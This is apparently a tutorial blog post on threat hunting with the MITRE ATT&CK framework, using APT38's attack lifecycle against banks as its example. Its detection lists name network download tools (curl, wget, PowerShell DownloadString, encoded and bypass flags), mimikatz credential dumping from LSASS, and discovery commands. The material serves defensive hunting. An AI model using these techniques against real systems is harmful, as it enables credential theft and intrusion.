Introduction to Threat Hunting - MITRE ATT&CK® Framework

MITRE ATT&CK®

MITRE ATT&CK® is a knowledge base of cyber adversary behavior and taxonomy for adversarial actions across their lifecycle. This can be used as a tool reference for the IR and Hunt team to have the details of the current APTs techniques, tactiques and procedure that are targeting the industry that they are part with.

In this discussion, we will explore how to perform a hunt using MITRE ATT&CK and do some procedural to make our hunt approach as efficient and effective as possible.

From a hunter’s perspective, it is a must to have a hunt process, developing a structural and procedural approach when hunting can help the hunters performing the task stay on track and able the hunter’s to document throughout the whole process that can be used later when delivering report.

Threat Hunting Tools

Scenario: Hunting APT38 Targeting Financial Sector

In this step, as a hunter we must identify who are those APT groups that are currently targeting your industry.

One way to do this is to effectively use a search engine: For example Google or DuckDuckGo

The image below is a result of a quick search for using “apt targeting financial sector” keyword.

Now, We landed on Mandiant[.]com APT list and use Find or Ctrl + F to speed up our search for APT of interest.

Then, we land on APT38:North Korea Threat Group that targets Financial Institutions World-Wide

#note: Steps on this discussion are similar approach when you search for specific APT that target different industries.

#note: To help you speed up the process look for “additional resources” tab on the blog posts you visit.

One great thing for hunters when hunting threat groups is that “they” are not alone, many organization and threat intelligence teams are in continuous pursuit to gather information about latest threats to be able to share it to the public that can be use by other teams for hunting.

To perform effectively as a hunter, we must look at this external sources as opportunity to expedite the process of our research.

The sample below is from Mandiant’s Threat Research Team, which gives us a full detail of how APT38 perform and structure their attack.

As a hunter, we can use this details to structure our hunt to correlate on their TTPs and for us to perform in a methodological approach.

Source: https://www.mandiant.com/resources/apt38-details-on-new-north-korean-regime-backed-threat-group

We’ve known our threat group of interest.

Now, we can use MITRE ATT&CK to map their TTPs. This can help us structure their attack life cycle and know how they perform their action.

Source: https://mitre-attack.github.io/attack-navigator//#layerURL=https%3A%2 %2Fattack.mitre.org%2Fgroups%2FG0082%2FG0082-enterprise-layer.json

Step 4: Structuring APT38 Attack Life Cycle

In this stage, according to Mandiant threat research team APT38 relied on watering holes and exploited an insecure out-of-date version of Apache Struts2 to execute code on system.

In most cases, APT38 gain initial foothold by these following:

      • Strategic Web Compromise
      • Apache Struts2 vulnerabilities

These type of approach exploits vulnerabilities in most web facing server.

To mitigate and monitor these exploits we can do the following:

      • Perform vulnerability scanning
      • Document all out-of-date servers for monitoring

To know all the vulnerabilities about Apache Struts2 you can visit CVE Details:

https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-6117/Apache-Struts.html

Know more about Technique T1990:

https://attack.mitre.org/techniques/T1190/

In this stage, a level 1 initial compromise is established through exploitation of out-of-date web facing server, after that just like a burglar after they successfully breached the house now they contact back to the other party awaiting for instruction.

According to Mandiant Research Team, APT38 perform  technique T1105 Ingress Tool Transfer to establish foothold by exploiting a known vulnerability of an out-of date Linux servers that host Apache Struts2 that can gave RCE(Remote Code Execution). Adversaries may transfer additional tools or other files from an external system into compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through established foothold done by previous exploitation. Once established, tools from attackers can be transferred from external sources to victim devices within the compromised environment.

To hunt for artifacts on this stage:

For hunters to hunt artifacts on Windows look for:

      • copy
      • finger
      • Powershell IEX,DownloadString(),Invoke-WebRequest

For hunters to hunt artifacts on Linux & Mac look for:

      • curl
      • scp
      • sftp
      • tftp
      • rsync
      • finger
      • wget

To mitigate these approach:

Use vulnerability scanning tools to enumerate all affected and out-of-date servers, if mitigation of these servers is not possible, document all the servers for monitoring.

Use Network Intrusion Prevention

Artifacts that can be use for hunting:

Firewall Related Event: Allowed Connection

Network monitoring: In/Out traffic in non-standard port

Anti-Virus logs: Whitelisting software / Alerts

Endpoint Sessions: RDP Session, VNC, Remote tools

#note: Hunters may want to dig into endpoint or server that contacts untrusted domain or external private IP addresses.

Know more about MITRE ATT&CK Technique T1105:

https://attack.mitre.org/techniques/T1105/

 

In this stage, account with non-administrator privilege is identified mostly local and standard domain account, APT38 then elevate from a normal user account to a admin account using set of tools to perform its intention with an admin privilege.

In this stage, APT38 perform their move by using living off the land techniques and possible in memory attacks such as usage of Powersploit Mimikatz module. 

Threat actors enumerate user credentials in this stage through:

      • Dumping Lsass cache: mimikatz Cred Dumping T1003
      • Dropped Account enumeration tool: SORRYBRUTE T1110

Those are some of the techniques use by APT38 to escalate and dump credentials to elevate their from a non-admin to an admin account.

To detect this type of privilege escalation attack:

      • Powershell with -En, -C, ExecPolicy -Bypass
      • Powershell Invoke-WebReqest
      • Powershell – .downloadString()

Also, Termination of Endpoint Services and Process:

      • Windows Defender
      • EDR
      • Anti-Virus

Learn more about OS Credential Dumping Technique T1003: https://attack.mitre.org/techniques/T1003/

Learn more about Brute Force Technique T1110:

https://attack.mitre.org/techniques/T1110/

    •  

APT38 successfully leverage from level 1 stage compromise with non-admin user account to a local administrator or domain admin account. Then, what happened in this stage is that APT38 can now perform internal recon on the level 1 compromised endpoint to map the environment and look for possible level 2 compromise jump. The next task perform by APT38 according to Mandiant Threat Research is to enumerate all possible details that can give them information about the organization’s network, processes, services, accounts, domain policies and etc.

This step is the half of the success for the APT38, allowing them to perform their operation on the compromised with an Administrator privilege, which gives them the ability to perform super user tasks.

APT38 maps different details on the network such as:
    • Network Topology: arp, routeprint, wmi, net*
    • Network Service: mDNS query dns-sd -B _ssh._tcp
    • Users: net.exe , /etc/psswd, /Users
    • System and Services: tasklist,sc,net start,systemctl
    • Group Policy: Get-DomainGPO, Get-DomainGPOLocalGroup
    • Firewall rules modifications: 2004,2005,5156,5146

As a hunter, we can monitor these techniques inside our network for anomalies. In such cases, for example using SIEM to monitor administrator commands such as wmi or firewall event ids that trigger when a rule was added.

E.g. Bob is a normal user of HR department but Bob’s account was caught logged in and has launched powershell.exe and has -En parameter and the time is outside of typical office hours, as a hunter this gave us a breadcrumbs that something is happening. This is a sample of a red flag that can be worth digging.

#note: For hunters, hunt for anomalies like combination of enumeration of processes and services together with user and network and then firewall modifications. An account with legitimate intention do not usually perform thee set of commands in a sequence approach, if any account usually local admin or domain-admin that execute these commands that match these anomalies then it might be worth digging.

Learn more about the following Techniques discussed:

T1046 Network Discover:

https://attack.mitre.org/techniques/T1046/

T1040 Network Sniffing:

https://attack.mitre.org/techniques/T1040/

T1007 System Service Discovery:

https://attack.mitre.org/techniques/T1007/

T1087 Account Discovery:

https://attack.mitre.org/techniques/T1087/

T1615 Group Policy Discovery:

https://attack.mitre.org/techniques/T1615/

T1082 System Information Discovery:

https://attack.mitre.org/techniques/T1082/

In this stage, APT38 try to stay on the compromised network as stealthy as possible. As threat actors stays longer on the system the more it is hard for the analyst from them to detect, within this stage registry keys, kernel configurations, security tools might been changed which allows them to move freely without a worry for detection.

In this stage, APT38 deploy additional tools such as malware to stay hidden until their transaction is completed. This can be done by dropping rootkits and stay hidden as long as their agenda is completed.

In this stage, these threat actors maintain and persist on the system through dropped rootkit malware.

After the mission, according to Mandiant Threat Research team APT38 covers their track by performing actions like:

      • Deleting log sources
      • Firmware corruption for anti-forensic
      • Disk-wipe to hide their artifacts
      • Data Manipulation
      • Hide artifacts

This leaves the compromised organization a huge impact in business and their infrastructure.

Learn more about the following techniques discussed:

T1565 Data Manipulation:

https://attack.mitre.org/techniques/T1565/

T1564 Hide Artifacts:

https://attack.mitre.org/techniques/T1564/

T1561 Disk Wipe:

https://attack.mitre.org/techniques/T1561/

T1495 Firmware Corruption:

https://attack.mitre.org/techniques/T1495/

T1537 Transfer Data to Cloud:

https://attack.mitre.org/techniques/T1537/

TA0040 Impact:

https://attack.mitre.org/tactics/TA0040/

Step 5: Structuring a Methodological Hunt Process for APT38

In this step, we will use the information we gathered during the mapping of our threat group of interest APT38. We will use APT38’s MITRE ATT&CK TTPs that can be used to lay out our focus on where to start on our hunt process.

In this step, the hunter or a hunt team should conduct research for the current TTPs that could be use by the attackers to target your industry. This includes the following:

      • Initial compromise T1190
      • Establish Foothold T1105
      • Privilege Escalation T1003, T1110
      • Internal Recon & Discovery
      • Transfer Funds & Mission Complete

As we lay out our APT38 Attack Lifecycle, we use that define this stage and match its corresponding TTPs.

In this stage, a hunter or hunt team must also check if there are documented known vulnerabilities from unpatched software that the organization has not implemented yet due to some specific reasons.

#tip: APT almost use same TTPs of attack. Using structured hunt process is not limited to few APT but it can be applied to known APT TTPs that is mapped by MITRE ATT&CK, this can not be only on Financial Sector but also targeting different industries.(e.g use of in memory injection like Powershell with .downloadString() parameter)

#note: An effective threat hunting must follow a methodological approach rather than searching for various type of threats, the starting is to define a specific, narrowly focused threat that could be underway in the environment.

In this step, hunters assume the possibilities of an already breached and attackers have already level 1 initial foothold. The hunter assesses the goals of the APT38 based on the the APT38 Attack Life Cycle, then formulates a “guess or questions” about what are the techniques, tactique and procedures that the attackers might use and what are the possible evidences created that can reveal their activities.

In formulating a hypothesis for APT38 is like making an informed guess and asking questions like:

    • If APT38 successfully gain initial foothold, then they must have found a way, can be through exploiting a public-facing application or can through phishing.
     
    • If APT38 are already performing lateral movement, they might use living off the land technique.
     
    • If APT38 are already inside, they might cover their tracks by clearing the systems event logs or perform data manipulation.
     
    • If adversaries are already inside, they will persist on the system through rootkits, Scheduled Tasks or Registry.

Those are the sample of guess and questions that hunters already assume that they are breached, from formulating a hypothesis hunters can start their investigation and move to step 3 which to identify and gather evidences.

In this step, hunt teams must identify and assemble the data sources they can analyze within their hunt, as they seek to find evidence or to disprove their formulated hypothesis.

In this step, hunters must document the steps including the data sources where their data comes from, to ensure that the hunt can be justified during reporting.

In performing the actual hunt process, information gathered during the mapping of our threat group APT38s Attack Life Cycle can be a good use together with MITRE ATT&CK framework. This can help hunters to know what and where to look for when diving into tons of loads of data from their source.

In this step, hunters or a hunt team must identify and gather their evidences of APT38 Attack Life Cycle through the data sources:

      • Event log management or SIEM   
      • Endpoint/Server Baseline copies
      • Network/NIDS logs
      • Firewall and IPS/IDS logs

Performing a hunt with a ton of data sources can be overwhelming, this can drown the hunt team and can perform a hunt ineffectively. To patch this lurking problem, hunt team must consider that there are legitimate activities in the system performed by Administrators, what they need to look for is anomalies during its usage such as unidentified account name, time zone, enumeration and etc, and correlate it with other evidence sources. Effective threat hunting can also rely on endpoint, system, network baselines which can effectively detect if there are changes in the system or the network.

#note: not all data sources are listed. As a hunter, we must know what are the available data sources our organization have, that is why threat hunting using human analogy,reasoning and logical approach together with the presence of right technology that can be used to gather data sources makes an effective hunting. Human alone cannot perform hunting without technology because human cannot outperform technology when it comes to data parsing and its memory, they all have to work together. To sum it up, No human, organization cannot perform threat hunting. No Technology, organization cannot perform threat hunting.

Evidences are gathered from the previous step.

In this step, gathered evidence and data is being correlated with the help of human analytical and visualization techniques, this is why threat hunting can be effectively done by human with the help of technology because the combination of these both can uncover relationships within evidences inside the data sources.

In this step, hunters must conduct comparison from the past baselines or have a quick chat with other IT teams to answer specific questions and concerns, effective threat hunting must “not live by bread alone” means that they cannot rely on their own understanding, that they need other people like IT leaders from different departments to help them correlate what they’ve found and to know its normal or malicious. Hunters on this stage must have a good understanding of what data patterns are associated with an adversary’s activity for the given stage in the attack chain and this can also be done by correlating evidences with MITRE ATT&CK framework.

Documentation.
 
In this step, hunters must present the types of evidences they collected, the techniques, tactique and procedures of how the analysis is performed during the hunt and what are the conclusions that are proved during the process.
 
This can be the following:
 
      • Uncovered Vulnerabilities
      • Detected phishing incident
      • Data Exfiltration
      • Data stolen
      • Account usage anomalies
      • Living Off The Land tools detected
      • Metrics of the hunt process
      • Root cause of compromise detected
      • Scope of affected machines, accounts and applications
      • Description of the technique revealed
      • IOC to be used to detect similar attacks
      • Lesson learned and Remediation
      • Recommendation
 
During this stage, reporting the data evidences presented to the management will open a discussion that can lead to incident response, patching newly uncovered vulnerabilities and improve the holes in your environment that are found during the hunt process. This will also lead to organization’s improvements such as patching blind spots and monitored the specific targets that can help future attacks and improve the whole organization’s infrastructure.